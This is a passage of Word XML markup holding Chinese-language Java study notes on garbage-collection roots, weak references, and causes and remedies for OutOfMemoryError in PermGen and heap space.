          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、栈中引用的对象，引用是在栈帧中的本地变量表中的，真正的对象在堆中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037103" w:rsidRPr="00F41A4C" w:rsidRDefault="00037103" w:rsidP="00037103">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、方法区</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>perm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的类静态属性引用的对象，以及常量引用的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037103" w:rsidRPr="00F41A4C" w:rsidRDefault="00037103" w:rsidP="00037103">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、本地方法栈中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JNI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Native</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法）的引用的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037103" w:rsidRPr="00F41A4C" w:rsidRDefault="00037103" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="006F459B" w:rsidP="00A54D14">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>弱引用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简单来讲就是不保证不被垃圾回收器回收的引用地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001322BE" w:rsidRPr="00F41A4C" w:rsidRDefault="007B47C1" w:rsidP="0046699C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而弱引用（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WeakRe</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ference</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）其生命周期是比较短暂，尽</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>管在那个时刻此地址还关联到一个变量地址，但是垃圾回器依然会执行清理命令，回收地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B47C1" w:rsidRPr="00F41A4C" w:rsidRDefault="007B47C1" w:rsidP="0046699C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB7B3A" w:rsidRDefault="003C347E" w:rsidP="00BB7B3A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00095AD1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00BB7B3A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00BB7B3A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>内存泄漏与内存溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00095AD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>异常分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1) OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> PermGen space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用了大量的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，使</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟机装载类的空间不够</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟机中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XX:PermSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XX:MaxPermSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数的大小，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XX:PermSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是初始永久保存区域大小，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XX:MaxPermSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是最大永久保存区域大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2)OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  Java heap space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="007F7B22" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AC5F97" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00AC5F97" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟机创建的对象太多，在进行垃圾回收之间，虚拟机分配的到堆内存空间已经用满了，与</w:t>
      </w:r>
      <w:r w:rsidR="00AC5F97" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Heap space</w:t>
      </w:r>
      <w:r w:rsidR="00AC5F97" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有关</w:t>
      </w:r>
      <w:r w:rsidR="00DA26DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>检查程序，看是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8585A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>死循环或不必要地重复创建大量对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2E1C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
